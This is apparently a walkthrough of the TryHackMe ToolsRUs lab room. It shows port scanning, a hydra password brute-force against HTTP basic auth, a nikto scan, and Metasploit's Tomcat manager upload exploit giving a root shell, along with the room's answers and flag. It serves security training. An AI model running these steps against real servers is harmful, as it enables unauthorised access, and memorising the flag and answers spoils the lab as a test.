TryHackMe | ToolsRUs

This is one (of many) walkthrough for the ToolsRUs CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws from this article.

Enumeration

As usual, I use nmap to see which ports are open.

┌──(root㉿kali)-[~]
└─$ nmap -sCV $IP-ADDRESS
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-10 15:21 UTC
Nmap scan report for ip-10-10-44-157.eu-west-1.compute.internal (10.10.44.157)
Host is up (0.0024s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 0778865de34f25a439399d85a904ac26 (RSA)
|   256 630d6bfb3654eeb5d30b30d448e03062 (ECDSA)
|_  256 2afc539dbe521922a9610e7f056ef274 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1234/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
MAC Address: 02:D0:4F:84:D6:57 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.56 seconds

From this command, there are several open ports. We can see that port 80 is open for the web-server. Furthermore, we can execute dirbuster to brute-force some hidden folders and files from the web-server.

$ dirbuster -u http://$IP-ADDRESS -l /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -e php,html,txt,js

This takes a little while. Just go for a coffee or just read more articles from my profile 🤓 (joking, not joking). From this command, you have enough information to answer the first three questions.

1. What directory can you find, that begins with a “g”? guidelines
2. Whose name can you find from this directory? bob
3. What directory has basic authentication? protected

From accessing the /protected path, you notice that this page, as the name suggests, is protected. It seems that this is the perfect scenario for hydra. However, I didn’t know yet which service to use. After some research, I noticed that http-get was the suitable service.

$ hydra -f -vV -l bob -P /usr/share/wordlists/rockyou.txt $IP-ADDRESS http-get /protected

[ATTEMPT] target $IP-ADDRESS - login "bob" - pass "justin" - 37 of 14344399 [child 3] (0/0)
...
[ATTEMPT] target $IP-ADDRESS - login "bob" - pass "amanda" - 51 of 14344399 [child 12] (0/0)
[80][http-get] host: $IP-ADDRESS login: bob   password: bubbles
[STATUS] attack finished for 10.10.44.157 (valid pair found)

4. What is bob’s password to the protected part of the website? bubbles

The next two questions answers are available from previous nmap execution.

5. What other port that serves a webs service is open on the machine? 1234

6. Going to the service running on that port, what is the name and version of the software? Apache Tomcat/7.0.88

At this point, my next challenge was to get comfortable with Nikto.

$ nikto -host http://$IP-ADDRESS:1234/manager/html

+ Target IP:          $IP-ADDRESS
+ Target Hostname:    $IP-ADDRESS
+ Target Port:        1234
+ Start Time:         2023-02-10 15:49:40 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-3092: /manager/html/localstart.asp: This may be interesting...
+ OSVDB-3233: /manager/html/manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/html/jk-manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/html/jk-status/manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/html/admin/manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/html/host-manager/manager-howto.html: Tomcat documentation found.
+ /manager/html/manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/jk-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/jk-status/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/admin/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/httpd.conf: Apache httpd.conf configuration file
+ /manager/html/httpd.conf.bak: Apache httpd.conf configuration file
+ /manager/html/manager/status: Default Tomcat Server Status interface found
+ /manager/html/jk-manager/status: Default Tomcat Server Status interface found
+ /manager/html/jk-status/status: Default Tomcat Server Status interface found
+ /manager/html/admin/status: Default Tomcat Server Status interface found
+ /manager/html/host-manager/status: Default Tomcat Server Status interface found
+ 8042 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2023-02-10 15:50:22 (GMT0) (42 seconds)

From this massive output, I noticed potential vulnerabilities that I could exploit using metasploit.

7. How many documentation files did Nikto identify? 5

8. What is the server version (run the scan against port 80)? Apache/2.4.18

9. What version of Apache-Coyote is this service using? 1.1

For the very last question, I had to research about which exploit was needed to solve the last two questions. Based on the nikto output, there was a vulnerability related with the upload of files to the web server. 🤔 I did a generic research about “tomcat metasploit” and got a very nice article about the problem in hands.

$ msfconsole

# search for tomcat exploits
$ search tomcat
....
 0   auxiliary/dos/http/apache_commons_fileupload_dos                2014-02-06       normal     No     Apache Commons FileUpload and Apache Tomcat DoS
 1   exploit/multi/http/struts_dev_mode                              2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution                             
 2   exploit/multi/http/struts2_namespace_ognl                       2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection                         
 3   exploit/multi/http/struts_code_exec_classloader                 2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
 4   auxiliary/admin/http/tomcat_ghostcat                            2020-02-20       normal     Yes    Apache Tomcat AJP File Read
 5   exploit/windows/http/tomcat_cgi_cmdlineargs                     2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability             
 6   exploit/multi/http/tomcat_mgr_deploy                            2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution   
 7   exploit/multi/http/tomcat_mgr_upload                            2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution                 
 8   auxiliary/dos/http/apache_tomcat_transfer_encoding              2010-07-09       normal     No     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
 9   auxiliary/scanner/http/tomcat_enum                                               normal     No     Apache Tomcat User Enumeration
 10  exploit/multi/http/atlassian_confluence_webwork_ognl_injection  2021-08-25       excellent  Yes    Atlassian Confluence WebWork OGNL Injection                               
 11  exploit/windows/http/cayin_xpost_sql_rce                        2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE                                   
....

# refine your search based on your goals
$ search exploit/multi/http/tomcat

Matching Modules
================

#  Name                                         Disclosure Date  Rank       Check  Description
-  ----                                         ---------------  ----       -----  -----------
0  exploit/multi/http/tomcat_mgr_deploy         2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
1  exploit/multi/http/tomcat_mgr_upload         2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
2  exploit/multi/http/tomcat_jsp_upload_bypass  2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass           

# I found my exploit
$ use exploit/multi/http/tomcat_mgr_upload
$ set USERNAME bob
$ set PASSWORD bubbles
$ set RHOST $IP-ADDRESS
$ set RPORT 1234
$ TARGETURI /manager
$ exploit
            

If I didn’t forget to put anything here, you should your meterpreter activated. You can now run commands on the server.

# whoami
meterpreter > getuid
Server username: root

# go for the flag
meterpreter > cd /root
meterpreter > cat flag.txt
ff1fc4a81affcc7688cf89ae7dc6e0e1

10. What user did you get a shell as? root

11. What text is in the file /root/flag.txt: ff1fc4a81affcc7688cf89ae7dc6e0e1

Conclusion

This CTF was really cool to test other tools that I don’t usually use to solve challenges. Some extra research was necessary in order to take full advantage of the tools. Kudos to tryhackme to create this one! 👍